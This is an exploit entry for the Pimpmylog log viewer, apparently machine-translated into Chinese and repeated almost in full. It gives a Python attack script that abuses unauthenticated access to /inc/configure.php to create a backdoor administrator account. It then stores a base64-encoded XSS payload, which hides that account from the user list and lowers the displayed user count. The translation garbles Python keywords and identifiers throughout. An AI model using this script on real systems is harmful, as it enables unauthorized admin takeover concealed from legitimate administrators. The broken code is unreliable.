#利用标题: Pimpmylog v1.7.14-不当访问控制
#日期: 2023-07-10
#利用作者: ThinkyFault
#供应商homepage: https://www.pimpmylog.com/
#软件link: https://github.com/potsky/pimpmylog
#版本: 1.5.2-1.7.14
#测试在: Ubuntu 22.04
#CVE : N/A
#Description: Pimpmylog遭受帐户创建端点上的访问控制不当,允许远程攻击者创建管理员帐户而没有任何现有权限。用户名没有消毒,可以作为存储XSS的向量。这使攻击者可以从合法的管理员中隐藏后门帐户的存在。根据以前的配置,攻击者可能能够在Apache,iis,nginx和/或PHP日志中查看敏感信息。攻击者可以通过调试功能查看服务器端环境变量,其中可能包括密码或API键。
导入请求
导入argparse
从base64导入b64encode
js=''var table=document.getElementById('userListtable');
var lows=table.getElementsbytagname('tr');
for(var i=0; i lows.length; i ++){
var cells=lows .getElementsBytagName('td');
for(var j=0; j cells.length; j ++){
var Anchors=单元格[J] .getElementsBytagName('a');
for(var k=0; k anchors.length; k ++){
如果(
锚[k] .innertext==='{}'||
锚[k] .innertext.includes('atob(')||
锚[k] .queryselector('script')!==null
){
行 .parentnode.removechild(rows );
}
}
}
}
var usercountlement=document.queryselector('。铅');
var userCountText=usercountlement.textContent;
var usercount=parseint(userCountText);
如果(!isnan(usercount)){
UserCount-;
usercountlement.textContent=usercount +'用户';
}'''
pareload='scripteval(atob('{}'));/script'
DEF后门(URL,用户名,密码):
config_url=url +'/inc/configure.php'
打印('[*]创建管理员帐户.')
r=requests.post(config_url,data={'s':'authsave','u':用户名,'p':密码})
如果r.status_code!=200:
打印('[!]发生错误')
返回
打印('[*]隐藏管理帐户.')
base64_js=b64encode(js.format(username).encode())。decode()
XSS_PAYLOAD=PAIRLOAD.FORMAT(base64_js)
r=requests.post(config_url,data={'s':'authsave','u': xss_payload,'p':密码})
如果r.status_code!=200:
打印('[!]发生错误')
返回
打印('[*]漏洞完成!')
Parser=argparse.argumentparser()
parser.add_argument(' - url',help='目标的基本URL',必需=true)
parser.add_argument(' - 用户名',默认='backdoor',help='后门帐户的用户名')
parser.add_argument(' - 密码',默认='Backdoor',help='后门帐户的密码')
args=parser.parse_args()
后门(args.url.rstrip('/'),args.username,args.password)
#日期: 2023-07-10
#利用作者: ThinkyFault
#供应商homepage: https://www.pimpmylog.com/
#软件link: https://github.com/potsky/pimpmylog
#版本: 1.5.2-1.7.14
#测试在: Ubuntu 22.04
#CVE : N/A
#Description: Pimpmylog遭受帐户创建端点上的访问控制不当,允许远程攻击者创建管理员帐户而没有任何现有权限。用户名没有消毒,可以作为存储XSS的向量。这使攻击者可以从合法的管理员中隐藏后门帐户的存在。根据以前的配置,攻击者可能能够在Apache,iis,nginx和/或PHP日志中查看敏感信息。攻击者可以通过调试功能查看服务器端环境变量,其中可能包括密码或API键。
导入请求
导入argparse
从base64导入b64encode
js=''var table=document.getElementById('userListtable');
var lows=table.getElementsbytagname('tr');
for(var i=0; i lows.length; i ++){
var cells=lows .getElementsBytagName('td');
for(var j=0; j cells.length; j ++){
var Anchors=单元格[J] .getElementsBytagName('a');
for(var k=0; k anchors.length; k ++){
如果(
锚[k] .innertext==='{}'||
锚[k] .innertext.includes('atob(')||
锚[k] .queryselector('script')!==null
){
行 .parentnode.removechild(rows );
}
}
}
}
var usercountlement=document.queryselector('。铅');
var userCountText=usercountlement.textContent;
var usercount=parseint(userCountText);
如果(!isnan(usercount)){
UserCount-;
usercountlement.textContent=usercount +'用户';
}'''
pareload='scripteval(atob('{}'));/script'
DEF后门(URL,用户名,密码):
config_url=url +'/inc/configure.php'
打印('[*]创建管理员帐户.')
r=requests.post(config_url,data={'s':'authsave','u':用户名,'p':密码})
如果r.status_code!=200:
打印('[!]发生错误')
返回
打印('[*]隐藏管理帐户.')
base64_js=b64encode(js.format(username).encode())。decode()
XSS_PAYLOAD=PAIRLOAD.FORMAT(base64_js)
r=requests.post(config_url,data={'s':'authsave','u': xss_payload,'p':密码})
如果r.status_code!=200:
打印('[!]发生错误')
返回
打印('[*]漏洞完成!')
Parser=argparse.argumentparser()
parser.add_argument(' - url',help='目标的基本URL',必需=true)
parser.add_argument(' - 用户名',默认='backdoor',help='后门帐户的用户名')
parser.add_argument(' - 密码',默认='Backdoor',help='后门帐户的密码')
args=parser.parse_args()
后门(args.url.rstrip('/'),args.username,args.password)